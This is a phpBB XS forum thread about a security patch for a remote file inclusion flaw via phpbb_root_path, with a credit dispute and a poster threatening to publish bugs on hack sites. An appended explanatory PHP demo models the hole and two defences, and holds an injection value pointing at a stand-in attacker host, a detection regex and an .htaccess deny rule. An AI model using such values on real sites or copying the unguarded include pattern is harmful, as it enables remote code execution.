Hi all,
since I've discovered a couple of issues with two files in XS, I've decided to release this quick patch.
As I said in the past, the best thing you can do to secure your site from REMOTE FILE INCLUSION via the phpbb_root_path method is to modify the .htaccess as I suggested in another post in this section.
To apply this patch, just replace the two files with the included ones.
Thank you.
P.S.: here is one of the links that report the functions.php vulnerability: http://www.securityfocus.com/bid/19961.
058-011 - FIXED - Security In Functions And BBCBMG
Subject: 058-011 - FIXED - Security In Functions And BBCBMG
Attachment: 058_011_functions_bbcbmg.zip
Description: 058-011 - Functions and BBCBMG
Filesize: 19.42 KB
Downloaded: 680 Time(s)
Subject: Re: 058-011 - FIXED - Security In Functions And BBCBMG
Since "you have"? Oh, then the credit is for you. Perfect, then I will release all the bugs on hack webpages, because here nobody gives credit.
See you.
Subject: Re: 058-011 - FIXED - Security In Functions And BBCBMG
Sorry, it's a wording problem... I didn't mean to take the credit for those, since the functions.php RFI has been reported here in at least four other posts... but I've fixed another couple of issues in functions and the BBCodes box, so I've decided to release this patch. But the "global" RFI fix in .htaccess that I provided weeks ago fixes even the problem in functions.php, which was reported here only recently but published only a few days ago.
I'll change the wording if you think that I'm taking credit for it. :sad:
Here are the "credits" for whoever published this on that site (there are other sites with this):
http://www.securityfocus.com/bid/19961
Subject: Re: 058-011 - FIXED - Security In Functions And BBCBMG
I don't even know what possesses anyone to write such an arrogant post as that, ByPassNull. Why should you have any credit? MG unofficially released the functions.php patch 2 days before you even posted your "fix", and Antonio Mercurio actually raised the issue 4 days before that...! There's a lot going on behind the scenes here that you do not know about, and there's no excuse for posts like that.
Subject: Re: 058-011 - FIXED - Security In Functions And BBCBM
Well then add
and look who he is. Again, I made the bug public, dude.
Subject: Re: 058-011 - FIXED - Security In Functions And BBCBMG
Well, if you really are AzzCoder, to whom we are all eternally grateful, could you please explain to me how you can pass a variable like phpbb_root_path to functions.php, because there's no way you can pass a variable into a closed function - some of us have even tried hacking our own websites with this method, and it just doesn't work (the simple phpBB constant fix released here is just a precaution). Fortunately I'm not the only one who doesn't believe it: http://www.neothermic.com/phpBB/viewtopic.php?p=281
I also see AzzCoder (you?) posting this same "exploit" for quite a few other phpBB-related releases, with the exception of Integramod, and not phpBB directly yet, which is quite strange. It would be greatly appreciated if you could enlighten us as to why you chose not to inform them, because there is absolutely no difference in the way the phpbb_root_path variable is defined in phpBBXS, all the phpBB modded derivatives I know of, and phpBB itself, since no mods change something as fundamental as that.
And as for Integramod, why, is this AzzCoder, admin of Integramod, also you? http://integramod.com/home/profile.php?mode=viewprofile&u=10219
The same poor English skills would suggest a link ;)
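For readers following the argument above: the following is an added illustration, not code from phpBB XS, Icy Phoenix, the 058-011 patch or any poster in this thread. It models the phpbb_root_path remote file inclusion pattern under discussion and the two defences the thread mentions (the IN_PHPBB constant guard and the "global" .htaccess rule). The include file name, the attacker URL and the RewriteCond rule are assumptions for the demo. Whether a given file is actually exposed depends on two things: register_globals being on, and $phpbb_root_path being used at file scope before the file assigns it, which is precisely the condition the posters above disagree about.

```php
<?php
// Added illustration, not code from phpBB XS, Icy Phoenix or the 058-011 patch.
// Models the phpbb_root_path RFI pattern and the two defences discussed in the
// thread. File names, the attacker URL and the .htaccess rule are assumptions.

// Model of a phpBB-derived include file requested DIRECTLY (e.g. /includes/functions.php)
// on a PHP 4 host with register_globals=On: request parameters become file-scope
// variables, so $phpbb_root_path is attacker-controlled when the file is not
// reached through a real page that already set it.
function vulnerable_include_target(array $get): string
{
    // register_globals does this implicitly; spelled out here for clarity.
    $phpbb_root_path = isset($get['phpbb_root_path']) ? $get['phpbb_root_path'] : './';
    // Typical file-scope include near the top of such a file. With allow_url_fopen
    // on (the PHP 4 default) a http:// prefix makes PHP fetch and execute remote code.
    return $phpbb_root_path . 'includes/bbcode.php';
}

// Defence 1, the "phpBB constant fix": refuse to run unless a page that defined
// IN_PHPBB included us. $in_phpbb stands in for defined('IN_PHPBB').
function guarded_include_target(array $get, bool $in_phpbb): ?string
{
    if (!$in_phpbb) {
        // real code: die('Hacking attempt'); modelled as null here
        return null;
    }
    // Reached only via a real page (index.php etc.), which assigned
    // $phpbb_root_path itself before including common.php.
    $phpbb_root_path = './';
    return $phpbb_root_path . 'includes/bbcode.php';
}

// Defence 2, the "global" .htaccess approach: reject any request whose query
// string tries to set phpbb_root_path, before PHP even runs. Assumed rule:
//   RewriteEngine On
//   RewriteCond %{QUERY_STRING} (^|&)phpbb_root_path= [NC]
//   RewriteRule .* - [F]
function htaccess_blocks(string $query_string): bool
{
    return (bool) preg_match('/(^|&)phpbb_root_path=/i', $query_string);
}

// Helper: does the computed include target point at a remote URL?
function is_remote(string $path): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $path);
}

// Constructed attacker request (assumed host name) and a legitimate one.
$attack = ['phpbb_root_path' => 'http://attacker.example/shell.txt?'];
$normal = [];

$t = vulnerable_include_target($attack);
printf("unguarded, direct request: include(%s) remote=%s\n", $t, is_remote($t) ? 'yes' : 'no');

printf("constant guard, direct request: %s\n", var_export(guarded_include_target($attack, false), true));
printf("constant guard, via index.php: %s\n", guarded_include_target($normal, true));

printf(".htaccess rule blocks attack query: %s\n",
    htaccess_blocks('phpbb_root_path=http://attacker.example/shell.txt?') ? 'yes' : 'no');
printf(".htaccess rule blocks normal query: %s\n",
    htaccess_blocks('t=123&start=0') ? 'yes' : 'no');
```

Run it with `php rfi_demo.php` on any PHP 7+ CLI. One caveat a practitioner would want: the query-string rule only covers GET parameters, while register_globals also imports POST fields and cookies, so on its own it is a stopgap; the IN_PHPBB guard at the top of every include file (or turning register_globals off) closes the actual hole.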
